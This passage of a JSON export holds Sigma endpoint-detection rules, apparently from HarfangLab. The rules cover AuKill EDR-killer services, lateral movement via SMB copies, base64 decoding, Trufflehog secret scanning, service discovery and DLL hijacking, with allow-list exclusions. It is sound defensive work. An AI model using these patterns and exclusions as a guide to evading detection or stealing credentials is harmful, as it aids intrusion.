],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bb878f5-2c04-4eea-95f3-66a02b04a863",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595665Z",
"creation_date": "2026-03-23T11:45:34.595669Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595676Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/",
"https://attack.mitre.org/techniques/T1569/002"
],
"name": "t1569_002_aukill_service_installed.yml",
"content": "title: AuKill Service Installed\nid: 3bb878f5-2c04-4eea-95f3-66a02b04a863\ndescription: |\n Detects the installation of the AuKill service.\n AuKill is a defense solution killer that uses a Process Explorer vulnerable driver to terminate security solutions' processes and services, and to unload their drivers.\n It registers itself as a service to establish persistence.\n It is recommended to investigate for other suspicious activities surrounding this event.\nreferences:\n - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\n - https://attack.mitre.org/techniques/T1569/002\ndate: 2023/04/24\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.AuKill\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName:\n - 'MSDriverSrv'\n - 'aSophos'\n - 'aSophosX'\n - 'auSophos'\n - 'aBase'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bb878f5-2c04-4eea-95f3-66a02b04a863",
"rule_name": "AuKill Service Installed",
"rule_description": "Detects the installation of the AuKill service.\nAuKill is a defense-solution killer that uses a vulnerable Process Explorer driver to terminate security solutions' processes and services, and to unload their drivers.\nIt registers itself as a service to establish persistence.\nIt is recommended to investigate other suspicious activities surrounding this event.\n",
"rule_creation_date": "2023-04-24",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bb903c4-6183-4e4b-af21-b67c40c67995",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090378Z",
"creation_date": "2026-03-23T11:45:34.090380Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090384Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1570/"
],
"name": "t1570_pe_move_smb_share.yml",
"content": "title: PE File Copied to an SMB Share\nid: 3bb903c4-6183-4e4b-af21-b67c40c67995\ndescription: |\n Detects copies or moves of executable files to an SMB share.\n This technique may be used by an attacker to copy malicious programs to another machine as a means of moving laterally.\n It is recommended to investigate the process moving the files and the files themselves to determine if they contain malicious tools or indicators.\nreferences:\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1570/\ndate: 2023/02/22\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n CommandLine|endswith:\n - ' \\\\\\\\*\\\\*.dll'\n - ' \\\\\\\\*\\\\*.exe'\n\n filter_from_share:\n CommandLine|contains:\n - 'robocopy.exe \\\\\\\\'\n - 'robocopy.exe? \\\\\\\\'\n - 'robocopy.exe?? \\\\\\\\'\n - 'robocopy.exe??? \\\\\\\\'\n - 'xcopy.exe \\\\\\\\'\n - 'xcopy.exe? \\\\\\\\'\n - 'xcopy.exe?? \\\\\\\\'\n - 'xcopy.exe??? 
\\\\\\\\'\n\n exclusion_dassault:\n ParentImage: '?:\\Program Files\\Dassault Systemes\\3DEXPERIENCE Launcher\\DataSafe\\\\*\\\\*\\1\\inst\\win_b64\\code\\bin\\DSYInsPipeServer.exe'\n\n exclusion_programfiles:\n CommandLine|endswith:\n - ' /c copy *.exe ?:\\Program Files\\\\*\\\\*.exe'\n - ' /c copy *.dll ?:\\Program Files\\\\*\\\\*.dll'\n - ' /c copy *.exe ?:\\Program Files (x86)\\\\*\\\\*.exe'\n - ' /c copy *.dll ?:\\Program Files (x86)\\\\*\\\\*.dll'\n\n exclusion_sccm:\n GrandparentImage: '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_msbuild:\n GrandparentImage:\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n\n exclusion_wpkg:\n GrandparentImage: '?:\\Program Files\\wpkg\\WPKGSrv.exe'\n\n condition: ((selection_bin or selection_cmdline) and selection_smb_share) and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bb903c4-6183-4e4b-af21-b67c40c67995",
"rule_name": "PE File Copied to an SMB Share",
"rule_description": "Detects copies or moves of executable files to an SMB share.\nThis technique may be used by an attacker to copy malicious programs to another machine as a means of moving laterally.\nIt is recommended to investigate the process moving the files and the files themselves to determine if they contain malicious tools or indicators.\n",
"rule_creation_date": "2023-02-22",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bc01309-2aa0-419f-addd-eed4eb92903a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T16:09:45.126562Z",
"creation_date": "2026-03-23T11:45:34.616819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616827Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md",
"https://attack.mitre.org/techniques/T1027/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1027_decoding_base64_macos.yml",
"content": "title: Base64 Data Decoded (macOS)\nid: 3bc01309-2aa0-419f-addd-eed4eb92903a\ndescription: |\n Detects the usage of the base64 utility to decode base64 encoded data.\n This technique can be used by an attacker to hide a malicious payload and evade security defenses.\n It is recommended to investigate the data that was decoded, how it was used, and the potentially malicious actions taken by the parent process.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md\n - https://attack.mitre.org/techniques/T1027/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/11/10\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027\n - attack.command_and_control\n - attack.t1132.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/base64'\n CommandLine|contains:\n - ' -D'\n - ' --decode'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_munki:\n GrandparentImage: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_homebrewshell:\n - ParentImage: '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - GrandparentImage: '/opt/homebrew/Cellar/ruby/*/bin/ruby'\n\n exclusion_cursor:\n ProcessAncestors|contains:\n - '|/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - '|/Applications/Cursor.app/Contents/Resources/app/resources/helpers/cursorsandbox'\n\n exclusion_claude:\n ProcessAncestors|contains:\n - '|/Users/*/.local/share/claude/versions/?.?.??'\n - '|/Users/*/Library/Application Support/Claude/claude-code/?.?.??/claude'\n\n exclusion_vscode:\n 
ProcessAncestors|contains: '|/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n\n exclusion_ruby:\n ProcessAncestors|contains: '|/Users/*/.rbenv/versions/*/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bc01309-2aa0-419f-addd-eed4eb92903a",
"rule_name": "Base64 Data Decoded (macOS)",
"rule_description": "Detects the usage of the base64 utility to decode base64 encoded data.\nThis technique can be used by an attacker to hide a malicious payload and evade security defenses.\nIt is recommended to investigate the data that was decoded, how it was used, and the potentially malicious actions taken by the parent process.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bd1769f-b066-48af-bf7e-7abcc7770d0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623328Z",
"creation_date": "2026-03-23T11:45:34.623330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623334Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0xToxin/status/1569711852942249985",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_user_execution_of_wscript.yml",
"content": "title: Suspicious wscript.exe User Execution\nid: 3bd1769f-b066-48af-bf7e-7abcc7770d0c\ndescription: |\n Detects the suspicious user execution of Wscript, executing a script located outside the C drive.\n This can be indicative of a user execution of a malicious script located inside a user-mounted infected ISO file.\n It is recommended to investigate the content of the script executed and malicious actions taken by the wscript process to determine the legitimacy of this action.\nreferences:\n - https://twitter.com/0xToxin/status/1569711852942249985\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/09/28\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wscript\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_context:\n ParentImage|endswith: '\\explorer.exe'\n CommandLine|contains:\n - '.wsf'\n - '.vbs'\n - '.js'\n CurrentDirectory: '?:\\'\n\n selection_drive:\n CommandLine|contains: '\\wscript.exe ?:\\'\n\n filter_drive:\n CommandLine|contains: '\\wscript.exe C:\\'\n\n exclusion_user:\n ProcessCommandLine|contains: ' ?:\\Users\\\\*\\AppData\\Roaming\\'\n\n exclusion_litetouch:\n ProcessCommandLine: '?:\\windows\\system32\\wscript.exe ?:\\MININT\\Scripts\\LiteTouch.wsf'\n\n exclusion_copilote:\n ProcessCommandLine|contains:\n - '?:\\Windows\\System32\\WScript.exe ?:\\Copilote\\copilote_exe\\cop_*\\verifmaj.wsf'\n - '\\verifmaj.wsf //job:copilote'\n - '\\copilote_exe\\cop_exe\\verifmaj.wsf //job:'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bd1769f-b066-48af-bf7e-7abcc7770d0c",
"rule_name": "Suspicious wscript.exe User Execution",
"rule_description": "Detects the suspicious user execution of Wscript, executing a script located outside the C drive.\nThis can be indicative of a user execution of a malicious script located inside a user-mounted infected ISO file.\nIt is recommended to investigate the content of the script executed and malicious actions taken by the wscript process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-09-28",
"rule_modified_date": "2026-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bdb8ee4-7315-4cab-8678-275764e2199a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072071Z",
"creation_date": "2026-03-23T11:45:34.072073Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072077Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_windows.yml",
"content": "title: Trufflehog Executed (Windows)\nid: 3bdb8ee4-7315-4cab-8678-275764e2199a\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Trufflehog\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\trufflehog.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bdb8ee4-7315-4cab-8678-275764e2199a",
"rule_name": "Trufflehog Executed (Windows)",
"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083543Z",
"creation_date": "2026-03-23T11:45:34.083545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083550Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_tasklist_svc.yml",
"content": "title: System Service Discovered via tasklist.exe\nid: 3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef\ndescription: |\n Detects the execution of tasklist.exe to enumerate system services.\n Adversaries can use this command during discovery phase to enumerate running system services.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/12/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\tasklist.exe'\n - OriginalFileName: 'tasklist.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' -svc'\n - '/svc' # works with not space between command and argument\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_commandline:\n CommandLine: 'tasklist /svc /fi imagename eq IpDesktopSoftphone.exe * /fi USERNAME eq *'\n\n exclusion_alcatel:\n ParentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - 'tasklist /svc /fi '\n - ' \"imagename eq '\n GrandparentImage|endswith: '\\cmd.exe'\n GrandparentCommandLine|contains|all:\n - 'Alcatel-Lucent Enterprise'\n - 'IP Desktop Softphone'\n\n exclusion_alcatel_phone:\n # tasklist /svc /fi \"imagename eq MyNOEPhoneIPDesktop.exe\" /fi \"status eq Unknown\"\n # tasklist /svc /fi \"imagename eq WerFault.exe\" /fi \"windowtitle eq IP Desktop Softphone*\"\n CommandLine|contains:\n - 'imagename eq MyNOEPhoneIPDesktop.exe'\n - 'windowtitle eq IP Desktop Softphone'\n - 'imagename eq IpDesktopSoftphone.exe'\n\n exclusion_gathernetworkinfo:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c tasklist /svc > 
processes.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_veritas:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c tasklist /svc > ..\\Temp\\\\????????-????-????-????-????????????-output.txt'\n GrandparentCommandLine: '?:\\Program Files\\Veritas\\NetBackup\\bin\\nbdisco.exe'\n\n # https://www.horoquartz.fr/etemptation/\n exclusion_etemptation:\n - CommandLine: 'tasklist /svc /nh /fo CSV /fi SERVICES eq hrmsrvnt etptaprd'\n - Ancestors|endswith: '\\Horoquartz\\Etemptation\\perl\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_manageengine:\n ParentImage|endswith: '\\bin\\java.exe'\n CommandLine: 'tasklist /svc /fi SERVICES eq uems_service'\n\n exclusion_system5:\n GrandparentImage|endswith: '\\perl.exe'\n CurrentDirectory: '?:\\Program Files\\Carestream\\System5\\syscheck\\'\n\n exclusion_cygwin:\n Ancestors|contains:\n - '?:\\WINAPP32\\CYGWIN\\bin\\cygrunsrv.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP64\\Perl64\\bin\\perl.exe|?:\\WINAPP32\\Cygwin\\bin\\bash.exe|?:\\WINAPP32\\Cygwin\\bin\\bash.exe'\n\n exclusion_guardian_browser:\n ParentImage: '?:\\User\\\\*\\AppData\\Local\\Programs\\guardian-browser\\Guardian Browser.exe'\n CommandLine: 'tasklist.exe /svc /fo csv'\n\n exclusion_servicenow1:\n ParentImage|contains: 'ServiceNow'\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n exclusion_servicenow2:\n GrandparentCommandLine: 'cmd /c chcp 65001 & tasklist /svc * > \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_nessus:\n GrandparentCommandLine|startswith: 
'?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\tasklist.exe /FO csv /svc > ?:\\Windows\\TEMP\\nessus_task_list'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef",
"rule_name": "System Service Discovered via tasklist.exe",
"rule_description": "Detects the execution of tasklist.exe to enumerate system services.\nAdversaries can use this command during the discovery phase to enumerate running system services.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600046Z",
"creation_date": "2026-03-23T11:45:34.600050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmnotificationbroker.yml",
"content": "title: DLL Hijacking via dmnotificationbroker.exe\nid: 3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2\ndescription: |\n Detects potential Windows DLL Hijacking via dmnotificationbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmnotificationbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\dui70.dll'\n - '\\windows.ui.immersive.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 